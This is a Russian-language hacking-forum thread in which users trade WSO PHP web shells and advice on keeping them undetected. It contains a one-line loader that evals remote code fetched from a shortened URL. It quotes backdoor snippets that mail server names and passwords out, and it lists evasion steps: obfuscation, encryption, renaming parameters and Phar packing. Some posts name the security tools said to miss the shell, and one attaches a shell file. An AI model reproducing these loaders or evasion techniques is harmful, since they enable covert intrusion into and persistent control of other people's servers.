• XSS.stack #1 – первый литературный журнал от юзеров форума

поделитесь wso shell не палящем

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
Aels сказал(а):
github.com

GitHub - aels/wso-ng: The new generation of famous WSO web shell. With perks included

The new generation of famous WSO web shell. With perks included - aels/wso-ng
github.com
PHP: 
<?php eval(substr(file_get_contents('https://bit.ly/get-wso-ng?pass=ed78a48738eb97ffb5624741bdf391c3'), 5)); ?>
Спалится всем, что умнее какого-то дефолтного сканера хостинга. Если хочешь чтобы он не палился его нужно переписывать)
1) добавить шифрование или обфускацию при запросах на использование функционала всо. Wso дергает дефолтные запросы когда ты им пользуешься - это палят средства защиты, советую глянуть в бурпе такой трафик.
2) поменять дефолтное название параметров
Когда улетает запрос на shell.php?privetyawso=data - это палевно)
3) Зашифровать сам всо, инклюдить и расшифровывать только если пользователь сабмитит ключ
4) Обфусцировать всо перед тем как шифровать его. Можно как быстрый и бесплатный вариант тем же старым-добрым обфускатором кробы пройтись, я думаю у многих тут он остался.
5) Поддерживать высокую энтропию(никаких хардкодженных ссылок, строк и прочего, все оборачивать хотя бы в б64)
Тогда может чёт и выйдет, и то, это не полный список
 
Последнее редактирование:
Попробуй вот эти

wso-webshell/wso.php at master · mIcHyAmRaNe/wso-webshell

🕹 wso php webshell. Contribute to mIcHyAmRaNe/wso-webshell development by creating an account on GitHub.
github.com
Удалить из кода:
PHP: 
if(array_key_exists('watching',$_POST)){
    $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('test@testmail.com', 'root', $tmp); // Edit or delete!
}

github.com

wso-webshell/wso.5.1.4.php at master · Josexv1/wso-webshell

WSO-Webshell. Contribute to Josexv1/wso-webshell development by creating an account on GitHub.
github.com
Удалить из кода:


PHP: 
//--------------Watching webshell!--------------
if(array_key_exists('watching',$_POST)){
    $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('razerz@protonmail.ch', 'wso', $tmp); // Edit or delete!
}

Так же шелл потом упаковать пакером Phar например
github.com

P.A.S.-Fork/packer.php at main · cr1f/P.A.S.-Fork

A modified version of the well-known webshell - P.A.S. by Profexer. Tries to solve the problem of detecting some requests and responses by various WAF/IDS. - P.A.S.-Fork/packer.php at main · cr1f/P...
github.com

или же попробовать другой шелл, P.A.S Fork
 
Пожалуйста, обратите внимание, что пользователь заблокирован
wso уже давно умер как скрипт
его в любом виде палят даже стандартные средства защиты на любом хостинге, или ftp
 
ImNotEvery сказал(а):
wso уже давно умер как скрипт
его в любом виде палят даже стандартные средства защиты на любом хостинге, или ftp
Если запаковать то не палят
 
Пожалуйста, обратите внимание, что пользователь заблокирован
mmaker сказал(а):
Если запаковать то не палят
Палят вообще без проблем, именно по этой причине wso и перестали торговать на рынке
 
Да, меня вообще удивляет, почему на рынке такой зоопарк однотипного софта, но за много лет никто так и не создал сервис по продаже не палящихся шеллов.

Кто может и хочет - берите идею, рынок то совсем пустой.
 
Лучше скажите какой софт палит WSO запакованный Phar'ом ?
Danger: kav, nod32, bdcored, uvscan, sav, drwebd, clamd, rkhunter, chkrootkit, iptables, ipfw, tripwire, shieldcc, portsentry, snort, ossec, lidsadm, tcplodg, sxid, logcheck, logwatch, sysmask, zmbscap, sawmill, wormscan, ninja

это все не реагирует на WSO, на некоторых серваках спасет PAS ( в 0.5% случаев) , на остальных все ок работает
 
Последнее редактирование:
Палят по сигнатурам запросов и ответов. Можно запаковать, но в запросе или ответе от скрипта всегда будет сигнатура для срабатывания и соответственно блок.

Поэтому, для успешного обхода, сам скрипт должен быть обфусцированным и при этом обфусцировать запросы и ответы. Только в этом случае будет полный обход любых WAF, т.к. палить будет нечего.
 
ImNotEvery сказал(а):
Палят вообще без проблем, именно по этой причине wso и перестали торговать на рынке
Хз что у вас там палят, сейчас с десяток проверил выборочно свои шелы WSO, да конечно что-то по слетало, но большая часть работает, на площадках различной серьёзности... Тут не маловажен фактор того, как он оббусифецирован, естественно его могут еще палить серьезные фавы по структуре запросов, тут с народом соглашусь, что его переписывать надо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
хоп хэй =)

робит даже когда евал запрещен вроде был ну кароче китаец молодец
 

Вложения

  • 123.php.txt
    193.1 КБ · Просмотры: 80
Пожалуйста, обратите внимание, что пользователь заблокирован
ну и на счет бекдоров, сам всяких таких штук нелюблю но шелл загружен много где такой и уже год висит без нареканий какихлибо
 
По сути wso умер, он умер в тот день когда его предложили использовать массово в паблике, но на vps vds хостах будет жить, а по сути время масс шелинга через wso уходит, нужны свои приват решения для хорошего результата, сейчас как вариант уход в приват с своими методами, детектов будет в разы меньше, которые всегда можно переписать. А если точечно работать то тут только свое решение. WSO да, проект хороший, я бы сказал великолепный, но т.к. паблик и палится по POST GET которые прописаны на серверной стороне автоматизации, он становится красным флажком для АВ. Пишите свое и не партесь, норм ребята юзают бекдоры для пролива, а если точечно то только свои решения или полностью переписанный WSO, где от WSO осталась только идея, которая великолепна в простоте свое реализации.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх